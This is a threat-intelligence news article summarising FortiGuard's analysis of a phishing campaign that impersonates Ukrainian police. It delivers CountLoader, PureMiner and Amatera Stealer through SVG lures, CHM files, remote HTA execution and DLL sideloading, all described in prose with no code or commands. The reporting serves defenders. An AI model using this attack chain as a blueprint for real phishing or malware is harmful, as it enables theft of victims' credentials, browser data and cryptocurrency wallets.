New Phishing Campaign Impersonates Ukrainian Police to Deliver Amatera Stealer and PureMiner
Ddos 
Attack chain | Image: FortiGuard Labs
FortiGuard Labs recently observed a phishing campaign impersonating Ukrainian government agencies, designed to deliver multiple malware payloads including Amatera Stealer and PureMiner. The operation demonstrates how attackers are innovating with SVG-based phishing lures to bypass defenses and execute fileless infections.
The campaign begins with forged emails claiming to be from the National Police of Ukraine. FortiGuard explains, “The phishing campaign begins with a forged email claiming to be a notice from the National Police of Ukraine. The email includes a malicious SVG attachment… The message states that an appeal has been submitted for review and warns that ignoring the notice could lead to further legal action.”
The attachment, “elektronni_zapit_NPU.svg”, embeds HTML that loads a spoofed Adobe Reader interface with the message “Please wait, your document is loading…” in Ukrainian, tricking recipients into downloading a password-protected archive.
Once opened, the archive contains a Compiled HTML Help (CHM) file with a malicious shortcut object. FortiGuard notes, “The object’s Click method runs a command that executes a remote HTML Application (HTA) resource in hidden mode.”
This triggers CountLoader, an obfuscated HTA script. Its role is clear: “The script’s primary role is to establish a connection with a remote server and wait for the next stage of the payload. Once the connection is made, the malware collects information from the victim’s system and sends it in an HTTP POST request… Afterward, the loader sends an encoded getUpdates message to retrieve additional commands from the server.”
Supported commands include downloading DLLs, executables, or MSI files; executing Python scripts; gathering domain information; and deleting traces of activity.
One of the delivered archives, ergosystem.zip, used DLL sideloading to install PureMiner. FortiGuard explains, “The decrypted payload has been identified as PureMiner, a stealthy .NET cryptominer. PureMiner collects system information—particularly video adapter specifications and usage details—and can deploy CPU-based or GPU-based mining modules depending on the attacker’s configuration.”
To optimize efficiency, PureMiner checks memory availability and GPU capabilities before launching mining operations. Communication with its command-and-control server is encrypted with 3DES.
Another archive, smtpB.zip, contained a Python interpreter and script that loaded Amatera Stealer directly into memory using the PythonMemoryModule project.
According to FortiGuard, “Amatera Stealer was used to harvest extensive information from infected systems, including credentials, system data, application data, browser files, and cryptocurrency wallets.”
It targeted both Gecko-based applications (Firefox, Thunderbird, SeaMonkey) and Chromium-based browsers (Chrome, Edge, Brave), extracting cookies, login data, and crypto-wallet extensions such as MetaMask, Trust Wallet, and Coinbase Wallet. It also collected data from applications like Steam, Telegram, FileZilla, and AnyDesk.
Related Posts:
- Amatera Stealer Unveiled: Rebranded ACR Stealer Now More Evasive, Targeting Your Data
- SVG Phishing Surge: How Image Files Are Being Weaponized to Steal Credentials
- SVG Files Weaponized: Phishing Attacks Embed HTML Code
- Sophos Uncovers Rising Threat of SVG-Based Phishing Attacks
- SVG Files: The Emerging Vector of Cyber Threats
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
